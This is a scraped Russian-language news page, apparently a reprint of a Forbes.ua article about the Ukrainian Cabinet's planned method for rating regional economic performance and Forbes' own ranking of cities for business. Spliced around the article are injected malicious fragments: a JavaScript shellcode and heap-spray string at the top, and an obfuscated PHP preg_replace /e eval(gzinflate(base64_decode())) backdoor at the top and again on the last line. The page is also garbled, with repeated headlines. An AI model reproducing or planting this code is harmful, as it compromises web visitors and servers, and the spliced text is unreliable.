%3cscript> var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580"); var spray = unescape("%u0a0a%u0a0a"); Рейтинг Кабмина: как Арсений Яценюк посчитает эффективность работы регионов
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
Европейская правда

Рейтинг Кабмина: как Арсений Яценюк посчитает эффективность работы регионов

Рейтинг Кабмина: как Арсений Яценюк посчитает эффективность работы регионов Рейтинг Кабмина: как Арсений Яценюк посчитает эффективность работы регионов

Как сообщает: http://forbes.ua/
Рейтинг Кабмина: как Арсений Яценюк посчитает эффективность работы регионов

С тех пор как тезис «Донбасс кормит Украину» потерял актуальность, место главного региона страны остается вакантным. Определить его призвана методика оценки социально-экономического развития областей, которую Кабмин собирается утвердить в начале сентября.


Арсений Яценюк Фото УНИАН

Агрегированный показатель будет рассчитываться на основании двух десятков параметров с учетом удельного веса каждого из них, определенного общей формулой. Среди параметров оценки, озвученных премьером – розничный товарооборот, темпы строительства, капитальные инвестиции, динамика задолженности по зарплате, качество медицинских услуг (в Кабмине честно признались, что не знают, как его оценить, не сводя к показателям койко-дней), качество дорог, система коммунального транспорта, доступ к интернету, удельный вес в ВВП, промпроизводство, качество образования в школах, реальные доходы граждан, уровень безработицы/занятости, рождаемость, энергоэффективность.

«Рейтинг регионов не должен использоваться с политической целью, основной параметр – качество», – уверил премьер. И уточнил, что по результатам оценивания будут приниматься кадровые решения – «повышение или наоборот».

При всей претензии на реформу Арсений Яценюк вовсе не первопроходец в вопросе оценивания эффективности работы регионов. В Украине были разработаны и успешно действовали несколько подобных формул, в том числе – в бытность Яценюка министром экономики. Возможно, поэтому абсолютное большинство параметров, озвученных нынешним главой Кабмина, были учтены и в предыдущих вариантах.

С различными вариантами методики оценки регионов, которые применяло правительство, можно ознакомиться здесь и здесь.

Учитывая долгую практику их применения, подотчетные чиновники имеют богатый бэкграунд расчета и мнение о сводных результатах. Как правило – нелицеприятное.

«Мы каждый месяц отчитывались Кабмину для расчета. И постоянно Киев попадал в аутсайдеры по такому показателю, как строительство! У нас при огромных показателях сданных квадратных метров динамика была 1-2%. А, например, Тернополь мог построить один дом и получить огромную дельту», – напоминает бывший представитель киевской мэрии.

Еще до назначения Михеила Саакашвили губернатором Одесской области и превращения ее в инвест-центр страны и мини-модель европейского будущего Украины, расчеты Forbes вывели Одессу на первое место среди самых благоприятных городов для бизнеса

Евгений Жовтяк, экс-глава Киевской обладминистрации, вспоминает, что в бытность его главой столичной области итоги подводились по 36 показателям, по которым оценивался каждый регион. «Сводились в интегрированные показатели, и по сумме баллов определялся рейтинг области. Главное, на что в то время обращалось внимание, это динамика, а не просто статистические показатели. Это же было и при Кабмине Азарова. При первом правительстве Яценюка таких рейтингов почему-то не было, и вот только через полтора года о них вспомнили, но уже подают как инновацию», – говорит он.

Как отмечает Жовтяк, среди традиционно учитываемых в формуле показателей есть те, на которые местные власти объективно влиять не могут – они зависят от общего развития страны или особенностей региона. С ним солидарен экс-глава Донецкого облсовета Анатолий Близнюк: «Нужно понимать, что в разных регионах разные структуры экономики. Раньше было дробление на группы, например, области 1-й группы, где развита экономика, и так далее (1-я группа – промышленные области, 2-я группа – сельскохозяйственные области, 3-я – горные и пригорные территории. – Forbes). Нельзя сравнивать Карпаты и Донбасс».

При этом бывшие губернаторы признают, что динамика показателей и продвижение в рейтинге напрямую зависят от профессиональных качеств руководителя области. «Например, когда я работал главой администрации, Киевская область в таком рейтинге переместилась с 9-го места на 1-е, но после прихода Веры Ульянченко – упала с 1-го на 24-е. Влияние главы администрации на место в рейтинге огромное», – поясняет Жовтяк.

Первый рейтинг в рамках новой методики представляет собой просто фиксирование данных, и лишь последующие дают представление о развитии. Для корректного их отображения должны коррелироваться стартовые показатели экономического потенциала и показатели динамики. «Например, инвестиция 100 млн в Киевскую область – мало, а в Кировоградскую – это прорыв», – подчеркивает Евгений Жовтяк.

Иногда засилье цифр в методике оценивания запутывало и сам Кабмин. «Мне запомнилось заседание, на котором из уст премьер-министра прозвучало, что область допустила увеличение объемов налоговой задолженности. А на самом деле благодаря хорошей работе областной налоговой в отчетном периоде были обнаружены скрытые долги предприятий, они попали в отчетность. До того времени, пока это не обнаружили, они не были в разряде налоговой задолженности, – объясняет Жовтяк. – Вместо того чтобы похвалить налоговую, что их обнаружили, министр Яценюк, не разобравшись, раскритиковал, что выросли долги».


Те же и Forbes

Редакция Forbes также рейтингует города. Однако, в отличие от правительства, мы не ставим перед собой задачу оценить все сферы жизнедеятельности, оценивая лишь бизнес-составляющую – комфорт для ведения дел. Рейтинг Forbes не учитывает количество коек в больницах и качество образования в украинских школах, однако рискнем предположить, что город, куда приходят инвестиции и который комфортен для бизнеса, не оставляет желать лучшего и в части других показателей, интересующих Арсения Яценюка. Наш рейтинг отражает привлекательность украинских городов (за вычетом Киева) для компаний, работающих на потребительском рынке. В методике Forbes учитываются 25 социально-экономических характеристик в 25 областных центрах и городах с населением свыше 200 000 человек.

Такое «пакетное» рейтингование еще при Кабмине Януковича делалось, и это никакая не реформа. В этом ничего нового нет, это все было, и главное – какая реакция правительства последует после данных этого оценивания Ярослав Жалило, президент Центра антикризисных исследований

Города ранжированы по суммарному количеству баллов, полученных при анализе 25 характеристик, и объединены в шесть групп показателей. При оценке по 24 характеристикам город получал от одного до четырех баллов. Наличие международного аэропорта приносило дополнительный балл.

Показатели объединялись в группы: человеческий капитал (численность населения, динамика численности населения); уровень преступности на 10 000 жителей, количество тяжких преступлений на 10 000 жителей; образованность (количество государственных вузов III–IV уровней аккредитации); сальдо миграции (разница между числом жителей, приехавших в город, и числом жителей, уехавших из него).

Покупательная способность. Благосостояние: средняя зарплата, изменение зарплаты по сравнению с предыдущим годом; доля квартир с ценой аренды свыше ориентировочного норматива за 1 кв. м.

Бизнес-климат: развитость малого бизнеса (поступления единого налога на душу населения); открытость города для сторонних инвесторов (прямые иностранные инвестиции на душу населения).

Экономическая устойчивость: динамика поступлений в городской бюджет; количество новостроек, сданных в эксплуатацию в отчетном году; изменение общей площади магазинов продуктового ритейла.

Инфраструктура: наличие международного аэропорта; количество международных, национальных и региональных автомобильных дорог; количество банковских отделений; количество торговых центров, аптек, магазинов бытовой техники и электроники.

Деловое здоровье: индекс, который специально для Forbes вывела аналитическая компания «Гео М». Отражает количество закрывшихся в 2014-м и первом квартале 2015 года торговых центров, банковских отделений, супермаркетов, аптек, магазинов по продаже бытовой техники и электроники.

В результате, еще до назначения Михеила Саакашвили губернатором Одесской области и возможного будущего превращения ее в инвест-центр страны и мини-модель европейского будущего Украины, расчеты Forbes вывели Одессу на первое место среди самых благоприятных городов для бизнеса. На втором месте – Львов, на третьем – Харьков.

Фигуранты рейтингов регионов уверены: любая расчетная модель несовершенна, и не отражает полной картины. «Такая отчетность никогда не отражала реальное место в рейтинге, и никогда не отразит реальную картину, – констатирует Близнюк. – Например, в мою бытность главой Донецкого облсовета Донецкая область занимала второе место в стране по зарплате после Киевской, первое – по экспортному потенциалу, а вот по экологии имела самое последнее место, и в обозримом будущем она не сможет сравниться с Карпатами. Такие вещи нельзя сравнивать, они никогда не будут объективными».

При этом он оговаривается, что в целом неплохо относится к самой идее оценки региона. «К сожалению, такие оценки припадают на выборы, и задачи ставятся как раз такие, которые бы показывали хорошую работу власти и подталкивали за нее голосовать. Но единственная правильная шкала оценки – уровень жизни людей», – уверен Близнюк.

«Методики рейтингования были разными, и всегда они неидеальны. Но лучше пусть они будут, чем их не будет. То, что такие итоги не подводились полтора года – свидетельство того, что правительство не знает, что делает», – резюмирует Жовтяк.


Рейтинг Кабмина: как Арсений Яценюк посчитает эффективность работы регионов
Рейтинг Кабмина: как Арсений Яценюк посчитает эффективность работы регионов Почтовая рассылка Forbes.ua Только самое важное

Европейская правда

Просмотров: 990
  •    

Мы в социальных сетях:    Twitter    FaceBook    Google+

Добавить комментарий








Информация

Комментировать статьи на нашем сайте возможно только в течении 40 дней со дня публикации.

При полном или частичном воспроизведении материалов прямая гиперссылка на сайт www.europravda.com.ua обязательна. Редакция не всегда разделяет мнения публикуемых материалов и не несет ответственности за достоверность и правдивость размещенной информации взятой с открытых источников. В случае необходимости использования текстовых, фото, графических, информационно-графических, видео, аудио и иных размещенных материалов, права на которые принадлежат третьим лицам, необходимо обращаться непосредственно к правообладателям. Если Вы являетесь автором материала или обладателем авторских прав на него и против его использования на сайте europravda.com.ua, пожалуйста свяжитесь с нами. Сайт не рекомендуется для чтения лицам младше + 18 лет. Редакция сайта открыта для сотрудничества, новых идей и предложений. Для связи с нами, пожалуйста используйте форму обратной связи.
<рhp preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/